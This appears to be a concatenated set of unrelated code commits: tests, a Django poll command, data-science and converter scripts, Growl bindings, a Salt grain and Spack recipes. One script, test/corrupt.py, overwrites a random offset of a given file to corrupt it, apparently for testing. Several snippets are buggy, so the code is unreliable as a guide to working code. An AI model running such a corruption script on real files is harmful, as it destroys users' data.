with mock.patch.dict("privacyidea.lib.queue.QUEUE_CLASSES", {"fake": FakeQueue}):
super(MockQueueTestCase, cls).setUpClass()
def setUp(self):
get_job_queue().reset()
OverrideConfigTestCase.setUp(self)
| Python | 0.000003 | |
6083124c110e0ce657b78f6178cd7464996a042b | add tests I want to pass | tests/test_geometries.py | tests/test_geometries.py | """This contains a set of tests for ParaTemp.geometries"""
########################################################################
# #
# This script was written by Thomas Heavey in 2017. #
# theavey@bu.edu thomasjheavey@gmail.com #
# #
# Copyright 2017 Thomas J. Heavey IV #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #
# implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
########################################################################
from __future__ import absolute_import
import pytest
class TestXYZ(object):
    """Tests ParaTemp.geometries.XYZ against a known stilbene .xyz file."""

    @pytest.fixture
    def xyz(self):
        # XYZ is imported lazily, inside the fixture.
        from ..ParaTemp.geometries import XYZ
        return XYZ('tests/test-data/stil-3htmf.xyz')

    def test_n_atoms(self, xyz):
        # The fixture file contains 66 atoms.
        assert xyz.n_atoms == 66

    def test_energy(self, xyz):
        # Exact float equality: the value is parsed verbatim from the file.
        assert xyz.energy == -1058630.8496721
| Python | 0 | |
8c9034e91d82487ae34c592b369a3283b577acc8 | Add a new test for the latest RegexLexer change, multiple new states including '#pop'. | tests/test_regexlexer.py | tests/test_regexlexer.py | # -*- coding: utf-8 -*-
"""
Pygments regex lexer tests
~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2007 by Georg Brandl.
:license: BSD, see LICENSE for more details.
"""
import unittest
from pygments.token import Text
from pygments.lexer import RegexLexer
class TestLexer(RegexLexer):
"""Test tuple state transitions including #pop."""
tokens = {
'root': [
('a', Text.Root, 'rag'),
('e', Text.Root),
],
'beer': [
('d', Text.Beer, ('#pop', '#pop')),
],
'rag': [
('b', Text.Rag, '#push'),
('c', Text.Rag, ('#pop', 'beer')),
],
}
class TupleTransTest(unittest.TestCase):
def test(self):
lx = TestLexer()
toks = list(lx.get_tokens_unprocessed('abcde'))
self.assertEquals(toks,
[(0, Text.Root, 'a'), (1, Text.Rag, 'b'), (2, Text.Rag, 'c'),
(3, Text.Beer, 'd'), (4, Text.Root, 'e')])
| Python | 0 | |
ba0c292753355e5ff7e8e131c61e8086f31b3b76 | Create src/task_2_0.py | src/task_2_0.py | src/task_2_0.py | # Раздел 1. Задача 2. Вариант 0.
# Task: print a favourite quotation by F. M. Dostoevsky, with the author's
# name on a separate line. (Translated from the original Russian comment.)
print("Жизнь, везде жизнь, жизнь в нас самих, а не во внешнем.")
print("\n\t\t\t\t\tФ.М.Достоевский")
# Keep the console window open until the user presses Enter.
input("\n\nНажмите Enter для выхода.")
| Python | 0.000039 | |
6f00204ae2603063eafbd74a369e9da0864854ca | Create new monthly violence polls | poll/management/commands/create_new_violence_polls.py | poll/management/commands/create_new_violence_polls.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
import traceback
from poll.models import Poll
from unregister.models import Blacklist
from django.conf import settings
from optparse import make_option
from poll.forms import NewPollForm
from django.contrib.sites.models import Site
from django.contrib.auth.models import User
from rapidsms.models import Contact
from django.db.models import Q
class Command(BaseCommand):
help = "Create new violence polls"
option_list = BaseCommand.option_list + (
make_option('-n', '--name', dest='n'),
make_option('-t', '--poll_type', dest='t'),
make_option('-q', '--question', dest='q'),
make_option('-r', '--default_response', dest='r'),
make_option('-c', '--contacts', dest='c'),
make_option('-u', '--user', dest='u'),
make_option('-s', '--start_immediately', dest='s'),
make_option('-e', '--response_type', dest='e'),
make_option('-g', '--groups', dest='g'),
)
def handle(self, **options):
edtrac_violence_girls = Poll.objects.create(
name="edtrac_violence_girls",
type="n",
question="How many cases of violence against girls were recorded this month? Answer in figures e.g. 5",
default_response='',
user=User.objects.get(username='admin'),
)
edtrac_violence_girls.sites.add(Site.objects.get_current())
edtrac_violence_boys = Poll.objects.create(
name="edtrac_violence_boys",
type="n",
question="How many cases of violence against boys were recorded this month? Answer in figures e.g. 4",
default_response='',
user = User.objects.get(username='admin'),
)
edtrac_violence_boys.sites.add(Site.objects.get_current())
edtrac_violence_reported = Poll.objects.create(
name='edtrac_violence_reported',
type='n',
question='How many cases of violence were referred to the Police this month? Answer in figures e.g. 6',
default_response='',
user=User.objects.get(username='admin'),
)
edtrac_violence_reported.sites.add(Site.objects.get_current())
| Python | 0.000002 | |
23c09555221b3f7500a4c658452c9c0cb223799c | Add evaluation using random forest | Train_SDAE/tools/evaluate_model.py | Train_SDAE/tools/evaluate_model.py | import numpy as np
# import pandas as pd
# import sys
from scipy.special import expit
from sklearn import ensemble
def get_activations(exp_data, w, b):
    """Sigmoid activations of one layer: expit(exp_data.T @ w + b)."""
    z = np.transpose(exp_data).dot(w) + b
    return expit(z)
# Order of *args: first all the weights and then all the biases
# (args[0] is a single sequence holding [W_1..W_nHLayers, b_1..b_nHLayers]).
def run_random_forest(nHLayers, exp_data, labels, *args):
    """Propagate exp_data through the layers, then fit a random forest on it."""
    # Debug output: element counts of the first few weight/bias entries.
    print len(args[0]), len(args[0][0]), len(args[0][1])
    print len(args[0][2])
    print "NewLine!\n", len(args[0][3])
    print "NewLine!\n", len(args[0][4])

    assert len(exp_data) == len(labels)

    # I think they should be already transposed when running the code. Will see
    act = exp_data#.T

    for i in range(nHLayers):
        print('Weights and biases for layer: ' + str(i+1))
        print np.asarray(args[0][i]).shape, np.asarray(args[0][nHLayers + i]).shape
        # NOTE(review): act.T here undoes the transpose that get_activations
        # applies internally -- confirm the intended orientation of exp_data
        # (samples x features vs. features x samples) before reusing this.
        act = get_activations(act.T, args[0][i], args[0][nHLayers + i])

    # 1000 depth-capped trees; out-of-bag score is the reported metric.
    rf = ensemble.RandomForestClassifier(n_estimators=1000, oob_score=True, max_depth=5)
    rfit = rf.fit(act, labels)
    print('OOB score: %.2f\n' % rfit.oob_score_)
| Python | 0 | |
009df3372804fa946b7e1bd4c0827e887b964b38 | Convert blogger to simple xml | convert.py | convert.py | from bs4 import BeautifulSoup
import io
import markdown2
import time
import codecs
file = io.open("Import/blog-03-03-2013.xml")
file_contents = file.read(-1)
#lxml xpath doesn't seem to understand blogger export
soup = BeautifulSoup(file_contents)
entries = soup("entry")
count = 0
def formatTime(timefield):
time_obj = time.strptime(entry(timefield)[0].string[0:16], "%Y-%m-%dT%H:%M")
return time.strftime("%Y%m%d%H%M%S", time_obj)
for entry in entries:
categories = entry("category")
tags = []
post = False
for category in categories:
if category["term"] == "http://schemas.google.com/blogger/2008/kind#post":
post = True
if category["scheme"] == "http://www.blogger.com/atom/ns#" and category["term"]:
tags.append(category["term"])
if post:
pub = formatTime("published")
updated = formatTime("updated")
filename_xml = "%s.blogger.xml" % pub
title = entry("title")[0].string
content = entry("content")[0].string
blog_file = io.open("Export/" + filename_xml, "w")
blog_file.write("<blog>\n\t<title>%s</title>\n\t<content><![CDATA[%s]]></content>\n</blog>" % (title, content))
blog_file.close()
count += 1
print "Found %d posts" % count
print "done!" | Python | 0.999999 | |
8348ce87a68592e7108c43687ebfdf12684a1914 | Add elementTypes.py file | elementTypes.py | elementTypes.py |
class elementC3D10():
    """Quadratic (10-node) tetrahedral element.

    Shape functions are evaluated in the element's natural coordinates
    (g, h, r). NOTE(review): this module references ``np`` but the file
    shows no import -- it needs ``import numpy as np`` at the top.
    """

    def __init__(self):
        self.name = 'C3D10'
        self.desc = 'Quadratic tetrahedral element'
        self.numNodes = 10
        self.numIntPnts = 4
        # Bug fix: was ``array(self.numNodes)`` -- ``array`` was undefined,
        # and a 0-d array cannot be written into by shapeFunctionMatrix.
        self.N = np.zeros(self.numNodes)
        self.setIpcs()

    def setIpcs(self):
        """Natural coordinates of the 4 integration points."""
        alpha = 0.1770833333
        beta = 0.4687500000
        # Consistency fix: use the ``np`` alias like the rest of the class
        # (the original mixed ``numpy`` and ``np``).
        self.ipcs = np.array([[alpha, alpha, alpha],
                              [beta,  alpha, alpha],
                              [alpha, beta,  alpha],
                              [alpha, alpha, beta ]])

    def shapeFunctionMatrix(self, ipc):
        """Fill self.N with the 10 shape-function values at point *ipc*."""
        g, h, r = ipc
        t = 1.0 - g - h - r          # fourth barycentric coordinate
        self.N[0] = (2.0 * t - 1.0) * t
        self.N[1] = (2.0 * g - 1.0) * g
        self.N[2] = (2.0 * h - 1.0) * h
        self.N[3] = (2.0 * r - 1.0) * r
        self.N[4] = 4.0 * t * g
        self.N[5] = 4.0 * g * h
        self.N[6] = 4.0 * t * h
        self.N[7] = 4.0 * t * r
        self.N[8] = 4.0 * g * r
        self.N[9] = 4.0 * h * r

    def interpFunc(self, nv):
        """Interpolate nodal values *nv* with the last-evaluated self.N."""
        return np.dot(self.N, nv)
class elementC3D4():
    """Linear (4-node) tetrahedral element."""

    def __init__(self):
        self.name = 'C3D4'
        self.desc = 'Linear tetrahedral element'
        self.numNodes = 4
        self.numIntPnts = 1
        # Bug fix: was ``np.array(self.numNodes)`` -- a 0-d array that
        # shapeFuncMatrix cannot index; a length-4 buffer is needed.
        self.N = np.zeros(self.numNodes)
        self.setIpcs()

    def setIpcs(self):
        """Natural coordinates of the single integration point.

        NOTE(review): the original left placeholders (alpha = beta =
        0.33333, marked "CHECK THESE VALUES") and an empty (3, 0) array.
        The 1-point Gauss rule for a tetrahedron uses the barycenter
        (0.25, 0.25, 0.25); confirm against the element reference before
        relying on quadrature results.
        """
        self.ipcs = np.array([[0.25, 0.25, 0.25]])

    def shapeFuncMatrix(self, ipc):
        """Fill self.N with the 4 shape-function values at point *ipc*."""
        g, h, r = ipc
        self.N[0] = 1.0 - g - h - r
        self.N[1] = g
        self.N[2] = h
        self.N[3] = r

    def interpFunc(self, nv):
        """Interpolate nodal values *nv* with the last-evaluated self.N."""
        return np.dot(self.N, nv)
| Python | 0.000001 | |
e789fb7246e7b926841f2d2912896fd0a0d14518 | Create login_portal.py | login_portal.py | login_portal.py | from splinter import Browser
print 'Starting...'
browser = Browser('firefox') # using firefox
browser.visit("http://portal.ku.edu.kw/sisapp/faces/login.jspx")
browser.fill('username','xxxxx') # enter student ID
browser.fill('password','yyyyy') # enter password
browser.find_by_id('loginBtn').click() # click login
| Python | 0.000001 | |
82acd4827b2f3f426a6b97f474c54886758cfab7 | add code to update fields | obztak/scratch/update-fields.py | obztak/scratch/update-fields.py | #!/usr/bin/env python
"""
Update survey fields
"""
__author__ = "Alex Drlica-Wagner"
import copy
import fitsio
import numpy as np
import pylab as plt
import skymap
from obztak.utils import fileio
import obztak.delve
from obztak.delve import DelveFieldArray
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('old')
parser.add_argument('new')
parser.add_argument('-o','--outfile',default='update_target_fields.csv')
args = parser.parse_args()
db = DelveFieldArray.load_database()
old = DelveFieldArray.load(args.old)
new = DelveFieldArray.load(args.new)
print("Running comparing to new fields...")
if len(old) != len(new):
print("Different number of fields")
delve = np.in1d(new.unique_id,db.unique_id)
#done = (new['PRIORITY'] < 0) & (old['PRIORITY'] >= 0)
done = (new['PRIORITY'] < 0) & np.in1d(new.unique_id, old.unique_id[old['PRIORITY'] >= 0])
plt.figure()
smap = skymap.SurveyMcBryde()
smap.draw_fields(new[done & ~delve])
smap.draw_des()
plt.title('New')
plt.show()
# Write here
out = DelveFieldArray.load(args.old)
### There are two ways of doing this that should give the same answers...
print("Running DelveSurvey.update_covered_fields...")
update = obztak.delve.DelveSurvey.update_covered_fields(old)
done = (update['PRIORITY'] < 0) & (old['PRIORITY'] >= 0)
delve = np.in1d(update.unique_id,db.unique_id)
plt.figure()
smap = skymap.SurveyMcBryde()
smap.draw_fields(update[done & ~delve])
#smap.draw_fields(update[done])
plt.title('Update')
print("Writing %s..."%args.outfile)
update.write(args.outfile)
# double check
assert len(fileio.read_csv(args.old)) == len(fileio.read_csv(args.outfile))
print("REMINDER: gzip the output file and move to data directory.")
| Python | 0.000001 | |
7d5dcaa0a72dbdd78e192f082bbdf261de1d8963 | Delete occurrences of an element if it occurs more than n times | Codewars/DeleteOccurrencesOfElementOverNTimes.py | Codewars/DeleteOccurrencesOfElementOverNTimes.py | # implemented with list comprehension with side-effects and a global variable
# there's a simpler way to do it with list appends that's probably no less efficient, since Python arrays are dynamic, but I wanted to try this out instead
from collections import Counter
c = Counter()
# for use in list comprehensions with side effects! Naughty...
def count_and_return(x):
    """Record one occurrence of *x* in the module-level Counter ``c``
    and return *x* unchanged (a deliberately side-effecting helper)."""
    c[x] += 1
    return x
def delete_nth(arr, max_e):
    """Return *arr* with each value limited to its first *max_e* occurrences.

    Original order is preserved; a non-positive *max_e* yields [].
    Rewritten to use a local Counter instead of the module-global ``c``
    mutated by a side-effecting list comprehension, so the function is
    self-contained and safe to call re-entrantly.
    """
    if max_e <= 0:
        return []
    seen = Counter()
    result = []
    for x in arr:
        if seen[x] < max_e:
            seen[x] += 1
            result.append(x)
    return result
| Python | 0.000001 | |
c7c7281fc964ac25aea291f18bbf29013f3f3d58 | question 7.1 | crack_7_1.py | crack_7_1.py | def fib_slow(number):
if number == 0: return 1
elif number == 1: return 1
else:
return fib_slow(number-1) + fib_slow(number-2)
def fib_fast(number, _memo={0: 1, 1: 1}):
    """Memoized Fibonacci with fib(0) == fib(1) == 1.

    Bug fix: the old version cached results in the fixed-size module list
    ``numbers`` ([0] * 6) and raised IndexError for number > 5; this memo
    dict grows as needed. The mutable default is intentional -- it is the
    shared cross-call cache.
    """
    if number not in _memo:
        _memo[number] = fib_fast(number - 1) + fib_fast(number - 2)
    return _memo[number]
numbers = [0] * 6
if __name__ == '__main__':
print fib_fast(5) | Python | 0.99996 | |
895570ad25b1475c1e9ce85a78f22f268dce8dec | Add visualization script | tools/visoutput.py | tools/visoutput.py | #!/usr/bin/env python
"""
An animated image
"""
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button
import sys
d_arr = []
t_arr = []
hs =[]
width = 0.35
maxpressure = 0.0
for line in sys.stdin:
toks = line.split(" ")
t_arr.append(toks[0])
d_arr.append((float(toks[1])-1)*10)
histline = []
histline.append(toks[3]) #1
histline.append(toks[3]) #2
histline.append(toks[5]) #3
histline.append(toks[7]) #4
histline.append(toks[9]) #5
histline.append(toks[11])#6
histline.append(toks[13])#7
histline.append(toks[15])#8
histline.append(toks[17])#9
histline.append(toks[19])#10
histline.append(toks[21])#11
histline.append(toks[23])#12
histline.append(toks[25])#13
histline.append(toks[27])#14
histline.append(toks[29])#15
histline.append(toks[31])#16
if (float(max(histline)) > maxpressure):
maxpressure = float(max(histline))
hs.append(histline)
fig = plt.figure()
fig.add_subplot(121)
l, = plt.plot(t_arr,d_arr)
plt.gca().invert_yaxis()
ax = fig.add_subplot(122)
ax.set_ylim(0.7, maxpressure)
nbComp = np.arange(len(histline))
rect = ax.bar(nbComp,hs[0],width)
ax.set_ylabel('Pressure')
ax.set_title('Pressure by compartment')
ax.set_xticks(nbComp + width)
ax.set_xticklabels(('C01', 'C02', 'C03', 'C04', 'C05','C06','C07','C08','C09','C10','C11','C12'))
axtime = plt.axes([0.2, 0.02, 0.65, 0.03])
stime= Slider(axtime, 'Time', 0, len(hs)-1, valinit=0,valfmt='%d')
def update(val):
    """Slider callback: redraw the pressure histogram for the chosen step.

    ``val`` is the slider's float value; we re-read ``stime.val`` (as the
    original did) rather than trusting the argument.
    """
    frame = int(stime.val)   # renamed from `time`, which shadows the stdlib module name
    ax.clear()               # clear() also drops the y-limit set at startup
    # Original bound the bar container to an unused local (`rect`); the
    # call is for its side effect only.
    ax.bar(nbComp, hs[frame], width)
    ax.set_ylim(0.7, maxpressure)   # restore the limit clear() reset
    fig.canvas.draw()
# Re-render the histogram whenever the slider moves.
stime.on_changed(update)

# (Removed a stale commented-out block of per-compartment line plots that
# duplicated the histogram view.)
plt.show()
1c4adbe07892d95ca6254dcc2e48e11eb2141fa7 | Create pixelconversor.py | Art-2D/pixelconversor.py | Art-2D/pixelconversor.py | # This program takes an image and converts it into 2D pixel art.
| Python | 0.000003 | |
096c8165ec2beacbc4897285b8fed439765d3e01 | Add test on update document title | test/integration/ggrc/models/test_document.py | test/integration/ggrc/models/test_document.py | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Integration tests for Document"""
from ggrc.models import all_models
from integration.ggrc import TestCase
from integration.ggrc.api_helper import Api
from integration.ggrc.models import factories
class TestDocument(TestCase):
    """Document model test cases."""
    # pylint: disable=invalid-name

    def setUp(self):
        """Create a fresh API helper for each test."""
        super(TestDocument, self).setUp()
        self.api = Api()

    def test_update_title(self):
        """A PUT with a new title is persisted on the Document."""
        original_title = "test_title"
        new_title = "update_test_title"
        document = factories.DocumentFactory(title=original_title)

        response = self.api.put(document, {"title": new_title})

        self.assert200(response)
        stored = all_models.Document.query.get(document.id)
        self.assertEqual(stored.title, new_title)
| Python | 0 | |
5172dcb5edd09afce992d237bd31700251fca4bd | Remove useless optional style argument to notify() | Bindings/python/Growl.py | Bindings/python/Growl.py | """
A Python module that enables posting notifications to the Growl daemon.
See <http://sourceforge.net/projects/growl/> for more information.
Requires PyObjC 1.1 <http://pyobjc.sourceforge.net/> and Python 2.3
<http://www.python.org/>.
Copyright 2003 Mark Rowe <bdash@users.sourceforge.net>
Released under the BSD license.
"""
from Foundation import NSArray, NSDistributedNotificationCenter, NSDictionary, NSNumber
from AppKit import NSWorkspace
class GrowlNotifier(object):
    """Registers with, and posts notifications to, the Growl daemon.

    Configure either by passing `applicationName', `notifications',
    `defaultNotifications' and `applicationIcon' to the constructor, or by
    overriding them as class attributes in a subclass.

    `defaultNotifications' is optional and falls back to `notifications'.
    `applicationIcon' is optional too, but falls back to a generic
    plain-text document icon, so supplying one is recommended.
    """
    applicationName = 'GrowlNotifier'
    notifications = []
    defaultNotifications = None
    applicationIcon = None

    def __init__(self, applicationName=None, notifications=None, defaultNotifications=None, applicationIcon=None):
        # Only arguments that were actually supplied shadow the
        # class-level defaults.
        for attr, value in (('applicationName', applicationName),
                            ('notifications', notifications),
                            ('defaultNotifications', defaultNotifications),
                            ('applicationIcon', applicationIcon)):
            if value is not None:
                setattr(self, attr, value)

    def register(self):
        """Advertise this application and its notification names to Growl."""
        if not self.applicationIcon:
            # Fall back to the generic plain-text document icon.
            self.applicationIcon = NSWorkspace.sharedWorkspace().iconForFileType_("txt")
        if self.defaultNotifications is None:
            self.defaultNotifications = self.notifications
        registration = NSDictionary.dictionaryWithDictionary_({
            'ApplicationName': self.applicationName,
            'AllNotifications': NSArray.arrayWithArray_(self.notifications),
            'DefaultNotifications': NSArray.arrayWithArray_(self.defaultNotifications),
            'ApplicationIcon': self.applicationIcon.TIFFRepresentation(),
        })
        center = NSDistributedNotificationCenter.defaultCenter()
        center.postNotificationName_object_userInfo_deliverImmediately_(
            "GrowlApplicationRegistrationNotification", None, registration, True)

    def notify(self, noteType, title, description, icon=None, appicon=None, sticky=False):
        """Post one notification of kind `noteType' (must be registered).

        `title' and `description' are the user-visible strings.  `icon'
        defaults to `self.applicationIcon'; `appicon' optionally overrides
        the sending application's icon; `sticky' keeps the notification on
        screen until dismissed.
        """
        assert noteType in self.notifications
        if icon is None:
            icon = self.applicationIcon
        payload = {
            'NotificationName': noteType,
            'ApplicationName': self.applicationName,
            'NotificationTitle': title,
            'NotificationDescription': description,
            'NotificationIcon': icon.TIFFRepresentation(),
        }
        if appicon is not None:
            payload['NotificationAppIcon'] = appicon.TIFFRepresentation()
        if sticky:
            payload['NotificationSticky'] = NSNumber.numberWithBool_(True)
        center = NSDistributedNotificationCenter.defaultCenter()
        center.postNotificationName_object_userInfo_deliverImmediately_(
            'GrowlNotification', None,
            NSDictionary.dictionaryWithDictionary_(payload), True)
def main():
    """Smoke test: register a toy application and post one notification."""
    from Foundation import NSRunLoop, NSDate

    class TestGrowlNotifier(GrowlNotifier):
        applicationName = 'Test Growl Notifier'
        notifications = ['Foo']

    notifier = TestGrowlNotifier(
        applicationIcon=NSWorkspace.sharedWorkspace().iconForFileType_('unknown'))
    notifier.register()
    # Spin the run loop briefly so registration is delivered before the
    # notification is posted.
    NSRunLoop.currentRunLoop().runUntilDate_(NSDate.dateWithTimeIntervalSinceNow_(0.1))
    notifier.notify('Foo', 'Test Notification', 'Blah blah blah')

if __name__ == '__main__':
    main()
| """
A Python module that enables posting notifications to the Growl daemon.
See <http://sourceforge.net/projects/growl/> for more information.
Requires PyObjC 1.1 <http://pyobjc.sourceforge.net/> and Python 2.3
<http://www.python.org/>.
Copyright 2003 Mark Rowe <bdash@users.sourceforge.net>
Released under the BSD license.
"""
from Foundation import NSArray, NSDistributedNotificationCenter, NSDictionary, NSNumber
from AppKit import NSWorkspace
class GrowlNotifier(object):
    """
    A class that abstracts the process of registering and posting
    notifications to the Growl daemon.

    You can either pass `applicationName', `notifications',
    `defaultNotifications' and `applicationIcon' to the constructor
    or you may define them as class-level variables in a sub-class.

    `defaultNotifications' is optional, and defaults to the value of
    `notifications'. `applicationIcon' is also optional but defaults
    to a pointless icon so is better to be specified.
    """
    # Class-level defaults; instances override them selectively in __init__.
    applicationName = 'GrowlNotifier'
    notifications = []
    defaultNotifications = None
    applicationIcon = None

    def __init__(self, applicationName=None, notifications=None, defaultNotifications=None, applicationIcon=None):
        # Only the arguments that were actually supplied shadow the
        # class-level defaults.
        if applicationName is not None:
            self.applicationName = applicationName
        if notifications is not None:
            self.notifications = notifications
        if defaultNotifications is not None:
            self.defaultNotifications = defaultNotifications
        if applicationIcon is not None:
            self.applicationIcon = applicationIcon

    def register(self):
        """
        Register this application with the Growl daemon.
        """
        if not self.applicationIcon:
            # Fall back to the generic plain-text document icon.
            self.applicationIcon = NSWorkspace.sharedWorkspace().iconForFileType_("txt")
        if self.defaultNotifications is None:
            self.defaultNotifications = self.notifications
        regInfo = {'ApplicationName': self.applicationName,
                   'AllNotifications': NSArray.arrayWithArray_(self.notifications),
                   'DefaultNotifications': NSArray.arrayWithArray_(self.defaultNotifications),
                   'ApplicationIcon': self.applicationIcon.TIFFRepresentation()}
        d = NSDictionary.dictionaryWithDictionary_(regInfo)
        notCenter = NSDistributedNotificationCenter.defaultCenter()
        # deliverImmediately=True so the registration is not coalesced or delayed.
        notCenter.postNotificationName_object_userInfo_deliverImmediately_("GrowlApplicationRegistrationNotification", None, d, True)

    def notify(self, noteType, title, description, icon=None, appicon=None, style=None, sticky=False):
        """
        Post a notification to the Growl daemon.

        `noteType' is the name of the notification that is being posted.
        `title' is the user-visible title for this notification.
        `description' is the user-visible description of this notification.
        `icon' is an optional icon for this notification.  It defaults to
        `self.applicationIcon'.
        `appicon' is an optional icon for the sending application.
        `style' appears vestigial: any non-None value merely flips the
        NotificationDefault flag to False below; its value is never
        forwarded to the daemon.
        `sticky' is a boolean controlling whether the notification is sticky.
        """
        assert noteType in self.notifications
        if icon is None:
            icon = self.applicationIcon
        n = {'NotificationName': noteType,
             'ApplicationName': self.applicationName,
             'NotificationTitle': title,
             'NotificationDescription': description,
             'NotificationDefault': NSNumber.numberWithBool_(True),
             'NotificationIcon': icon.TIFFRepresentation()}
        if style is not None:
            # NOTE(review): only the *presence* of `style' matters here;
            # its actual value is ignored — confirm intent.
            n['NotificationDefault'] = NSNumber.numberWithBool_(False)
        if appicon is not None:
            n['NotificationAppIcon'] = appicon.TIFFRepresentation()
        if sticky:
            n['NotificationSticky'] = NSNumber.numberWithBool_(True)
        d = NSDictionary.dictionaryWithDictionary_(n)
        notCenter = NSDistributedNotificationCenter.defaultCenter()
        notCenter.postNotificationName_object_userInfo_deliverImmediately_('GrowlNotification', None, d, True)
def main():
    """Smoke test: register a toy application and post one notification."""
    from Foundation import NSRunLoop, NSDate

    class TestGrowlNotifier(GrowlNotifier):
        applicationName = 'Test Growl Notifier'
        notifications = ['Foo']

    n = TestGrowlNotifier(applicationIcon=NSWorkspace.sharedWorkspace().iconForFileType_('unknown'))
    n.register()
    # A small delay to ensure our notification will be shown.
    NSRunLoop.currentRunLoop().runUntilDate_(NSDate.dateWithTimeIntervalSinceNow_(0.1))
    n.notify('Foo', 'Test Notification', 'Blah blah blah')

if __name__ == '__main__':
    main()
| Python | 0 |
41752bfcbc0a1afdf7a0f3caa52285af08d131dd | Create get_var.py | get_var.py | get_var.py | import parse_expr
variables = {}
def getVar(key):
if key[0] == '%':
return variables[key[1:]]
elif key[-1] in ('+', '-', '/', '*'):
return parse_expr(key)
else:
return key
| Python | 0.000002 | |
e42142498f2ef2b3e78d1becb024441500902a79 | add corruptor | test/corrupt.py | test/corrupt.py | #!/usr/bin/env python
from __future__ import print_function
import os
import sys
import random
# Argument validation.  NOTE: the original condition used ``and``, which
# evaluated sys.argv[2] even when fewer than 3 arguments were given
# (raising IndexError instead of printing usage) and let an empty
# magic_string through when the count was right.  ``or`` short-circuits
# after the length check and enforces both rules stated in the usage text.
if len(sys.argv) != 3 or not sys.argv[2]:
    print('''
Usage: corrupt.py filename magic_string
magic_string is what you want to write to the file
it can not be empty and will be randomly placed \n\n''')
    sys.exit(1)
size = 0    # file size in bytes (filled in below)
index = 0   # offset actually written to (reported at the end)
try:
    size = os.stat(sys.argv[1]).st_size
except Exception as e:
    # Any stat failure (missing file, permissions, ...) is fatal.
    print(e)
    sys.exit(1)

with open(sys.argv[1], "rb+") as f:
    # Pick a uniformly random offset.  NOTE(review): randint(0, size) is
    # inclusive of ``size`` itself, so the write can land exactly at
    # end-of-file and *append* rather than overwrite — confirm intent.
    index = random.randint(0, size)
    f.seek(index)
    # NOTE(review): writes a str into a binary-mode file; fine on
    # Python 2, but Python 3 would require bytes (sys.argv[2].encode()).
    f.write(sys.argv[2])
print("Corrupted file offset: %s\n" % index)
| Python | 0.999262 | |
d2f18cc0992d4d7217583cd2601bc90afaa93a04 | add grain that detects SSDs | salt/grains/ssds.py | salt/grains/ssds.py | # -*- coding: utf-8 -*-
'''
Detect SSDs
'''
import os
import salt.utils
import logging
log = logging.getLogger(__name__)
def ssds():
    '''
    Return list of disk devices that are SSD (non-rotational)
    '''
    # Renamed locals: `dir` shadowed the builtin; paths are now built
    # with os.path.join instead of manual '/' concatenation.
    ssd_devices = []
    for root, dirs, _files in os.walk('/sys/block'):
        for device in dirs:
            # The kernel exposes a 0/1 "rotational" flag per block device.
            flagfile = os.path.join(root, device, 'queue', 'rotational')
            if not os.path.isfile(flagfile):
                # Guard clause replaces the original deeply-nested else.
                log.warning(flagfile + ' does not exist for ' + device)
                continue
            with salt.utils.fopen(flagfile, 'r') as _fp:
                flag = _fp.read(1)
            if flag == '0':
                # 0 == non-rotational == SSD
                ssd_devices.append(device)
                log.info(device + ' is a SSD')
            elif flag == '1':
                log.info(device + ' is no SSD')
            else:
                log.warning(flagfile + ' does not report 0 or 1')
                log.debug(flagfile + ' reports ' + flag)
    return {'SSDs': ssd_devices}
| Python | 0.000002 | |
936c2327d6be9da48dfbef47c17167510e9c2262 | Create bzip2.py | wigs/bzip2.py | wigs/bzip2.py | class bzip2(Wig):
tarball_uri = 'http://www.bzip.org/1.0.6/bzip2-$RELEASE_VERSION$.tar.gz'
last_release_version = 'v1.0.6'
| Python | 0.000007 | |
c2ca8328835d544440fd3b87813e2768ece58685 | Add new package: audacious (#16121) | var/spack/repos/builtin/packages/audacious/package.py | var/spack/repos/builtin/packages/audacious/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Audacious(AutotoolsPackage):
    """A lightweight and versatile audio player."""

    homepage = "https://audacious-media-player.org/"
    url = "https://github.com/audacious-media-player/audacious/archive/audacious-4.0.2.tar.gz"

    # Known releases with their sha256 checksums.
    version('4.0.2', sha256='92f30a78353c50f99b536061b9d94b6b9128760d546fddbf863e3591c4ac5a8d')
    version('4.0.1', sha256='203195cf0d3c2e40d23c9895269ca0ace639c4a2b4dceb624169d75337059985')
    version('4.0', sha256='cdfffd0eb966856980328ebb0fff9cbce57f99db9bda15e7e839d26c89e953e6')
    version('3.10.1', sha256='c478939b4bcf6704c26eee87d48cab26547e92a83741f437711178c433373fa1')
    version('3.10', sha256='82710d6ac90931c2cc4a0f0fcb6380ac21ed42a7a50856d16a67d3179a96e9ae')

    # Full autotools chain is needed at build time because the configure
    # script is regenerated via autogen.sh (see autoreconf below).
    depends_on('m4', type='build')
    depends_on('autoconf', type='build')
    depends_on('automake', type='build')
    depends_on('libtool', type='build')
    depends_on('glib')
    depends_on('qt')

    def autoreconf(self, spec, prefix):
        # Run the project's own autogen.sh (instead of plain autoreconf)
        # to generate the configure script from the GitHub archive.
        bash = which('bash')
        bash('./autogen.sh')
| Python | 0.00002 | |
4287d2290c581b907b08efabc1e6bccea4019ac6 | add new package (#15743) | var/spack/repos/builtin/packages/py-pyface/package.py | var/spack/repos/builtin/packages/py-pyface/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
# NOTE(review): unlike the sibling spack packages, no `from spack import *`
# appears above this class as shown here — PythonPackage/version/variant/
# depends_on would be undefined; confirm the import was not dropped.
class PyPyface(PythonPackage):
    """The pyface project contains a toolkit-independent GUI abstraction layer,
    which is used to support the "visualization" features of the Traits
    package. Thus, you can write code in terms of the Traits API (views, items,
